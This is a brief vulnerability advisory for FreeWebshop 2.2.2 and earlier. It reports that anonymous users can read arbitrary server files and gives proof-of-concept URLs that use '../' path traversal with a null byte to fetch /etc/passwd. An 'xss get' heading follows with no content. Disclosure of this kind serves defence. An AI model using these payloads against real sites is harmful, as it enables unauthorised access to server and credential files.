FreeWebshop <=2.2.2
severity: hight
vendor site: http://www.freewebshop.org/
impact: an anonymous user can access anyfile on the remote server
PoC :
http://site.com/?page=../../../../../../../../../../etc/passwd%00
http://site.com/index.php?page=../../../../../../../../../../etc/passwd%00
xss get :
laurent gaffie & benjamin mosse
http://s-a-p.ca/
contact: [email protected]